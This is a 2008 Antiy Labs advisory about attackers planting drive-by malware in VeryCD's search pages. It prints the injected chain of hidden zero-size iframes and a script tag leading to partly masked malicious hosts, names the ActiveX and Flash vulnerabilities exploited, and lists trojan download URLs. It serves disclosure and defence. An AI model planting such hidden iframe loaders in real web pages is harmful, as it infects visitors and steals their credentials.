|
|
 |
 |
| VeryCD - 分享互联网网站搜索引擎被挂马事件 |
| |
 |
| 出处:安天实验室 时间:2008年7月15日 |
| |
7月15日,安天实验室发现,VeryCD - 分享互联网网站搜索引擎(http://www.verycd.com/) 被黑客植入病毒,用户如果访问该网站,并通过其搜索引擎搜索随便一个名称都会中马,如:“电影”,系统就会自动从恶意网站上下载并运行恶意程序。被感染病毒的用户系统可能被远程控制,盗取用户敏感信息。甚至导致死机。
该网站问题代码:
src="http://img.awo****.cn/verycd/websrc/ss/s1.htm"
http://img.awo****.cn/verycd/websrc/ss/s1.htm问题框架代码:
<iframe src=http://222.37.134.***/adtools/adtools/index.htm width=0 height=0 frameborder=0></iframe>
http://222.37.134.***/adtools/adtools/index.htm问题框架代码:
<iframe src=http://va9sdh****.cn/jj1.htm
width=0 height=0 frameborder=0></iframe>
http://va9sdh****.cn/jj1.htm问题框架代码:
<iframe src=http://va9sdh****.cn/xi/xx.htm
width=50 height=0></iframe>
<script src='http://s123.c***.com/stat.php? id=916031&web_id=916031' language='JavaScript'charset='gb2312'></script>
http://va9sdh****.cn/xi/xx.htm 网马代码:
以上加密网马解密后可知利用以下漏洞来传播:
最新的Microsoft Access快照查看器ActiveX控件任意文件下载漏洞:
Microsoft Office Snapshot Viewer ActiveX Exploit
(clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9) :
还有其他漏洞:
MS06014漏洞 (clsid:BD96C556-65A3-11D0-983A-00C04FC29E36)RealPlayer播放器IERPCtl.IERPCtl.1漏洞
联众世界游戏大厅所安装的GLCHAT.GLChatCtrl.1 ActiveX控件漏洞Real Networks RealPlayer包含的'rmoc3260.dll' ActiveX控件存在内存破坏漏洞Adobe Flash Player SWF文件漏洞
百度搜霸ActiveX控件远程代码执行漏洞
当用户访问http://www.verycd.com/时,并通过其搜索引擎搜索随便一个名称都会中马,如:“电影”,系统会自动下载以下病毒文件:
http://bnasnd****.cn/9/ck.exe
病毒名:(Trojan-Downloader.Win32.Agent.vgu)
http://ssskuk****.cn/inte/dlld1.exe
病毒名:(Trojan-GameThief.Win32.OnLineGames.satq)
http://ssskuk****.cn/inte/dlld2.exe
病毒名:(Trojan-GameThief.Win32.OnLineGames.sfcp)
http://ssskuk****.cn/inte/dlld3.exe
病毒名:(Trojan-GameThief.Win32.OnLineGames.sfcp)
http://ssskuk****.cn/inte/dlld4.exe
病毒名:(Trojan-GameThief.Win32.OnLineGames.sfcp)
http://ssskuk****.cn/inte/dlld5.exe
病毒名:(Trojan-GameThief.Win32.OnLineGames.sfcp)
http://ssskuk****.cn/inte/dlld6.exe
病毒名:(Trojan-GameThief.Win32.OnLineGames.sfcp)
http://ssskuk****.cn/inte/dlld7.exe
病毒名:(Trojan-GameThief.Win32.OnLineGames.sfcp)
http://ssskuk****.cn/inte/dlld8.exe
病毒名:(Trojan-GameThief.Win32.OnLineGames.sfcp)
http://ssskuk****.cn/inte/dlld9.exe
病毒名:(Trojan-GameThief.Win32.OnLineGames.sfcp)
http://ssskuk****.cn/inte/dlld10.exe
病毒名:(Trojan-GameThief.Win32.OnLineGames.sasu)
http://ssskuk****.cn/inte/dlld11.exe
病毒名:(Trojan-GameThief.Win32.OnLineGames.sfcp)
http://ssskuk****.cn/inte/dlld12.exe
病毒名:(Trojan-GameThief.Win32.OnLineGames.sfcp)
http://ssskuk****.cn/inte/dlld13.exe
病毒名:(Trojan-GameThief.Win32.OnLineGames.sfcp)
http://ssskuk****.cn/inte/dlld14.exe
病毒名:(Trojan-GameThief.Win32.OnLineGames.sfcp)
http://ssskuk****.cn/inte/dlld15.exe
病毒名:(Trojan-GameThief.Win32.OnLineGames.sfcp)
http://adwim****.cn/inte/dlld16.exe
病毒名:(Trojan-GameThief.Win32.OnLineGames.rxxp)
http://adwim****.cn/inte/dlld17.exe
病毒名:(Trojan-GameThief.Win32.OnLineGames.sast)
http://adwim****.cn/inte/dlld18.exe
病毒名:(Trojan-GameThief.Win32.OnLineGames.sasz)
http://adwim****.cn/inte/dlld19.exe
病毒名:(Trojan-GameThief.Win32.OnLineGames.rzki)
http://adwim****.cn/inte/dlld20.exe
病毒名:(Trojan-GameThief.Win32.OnLineGames.sata)
http://adwim****.cn/inte/dlld21.exe
病毒名:(Trojan-GameThief.Win32.OnLineGames.sasu)
http://adwim****.cn/inte/dlld22.exe
病毒名:(Trojan-GameThief.Win32.OnLineGames.satp)
http://adwim****.cn/inte/dlld23.exe
病毒名:(Trojan-GameThief.Win32.OnLineGames.sasr)
http://adwim****.cn/inte/dlld24.exe
病毒名:(Trojan-GameThief.Win32.OnLineGames.sasr)
http://adwim****.cn/inte/dlld25.exe
病毒名:(Trojan-GameThief.Win32.OnLineGames.satp)
http://adwim****.cn/inte/dlld26.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.appy)
http://adwim****.cn/inte/dlld27.exe
病毒名:(Trojan-GameThief.Win32.OnLineGames.sasu)
http://adwim****.cn/inte/dlld28.exe
病毒名:(Trojan-GameThief.Win32.OnLineGames.satq)
http://adwim****.cn/inte/dlld29.exe
病毒名:(Trojan-GameThief.Win32.OnLineGames.sdlo)
http://adwim****.cn/inte/dlld30.exe
病毒名:(Trojan-GameThief.Win32.OnLineGames.sasu)
以上病毒文件为下载者木马和游戏盗号木马,自动运行后将会,盗取用户敏感信息,甚至导致死机。由于下载数量太多,这里不一一分析。 |
|
|
|
 |
 |
|
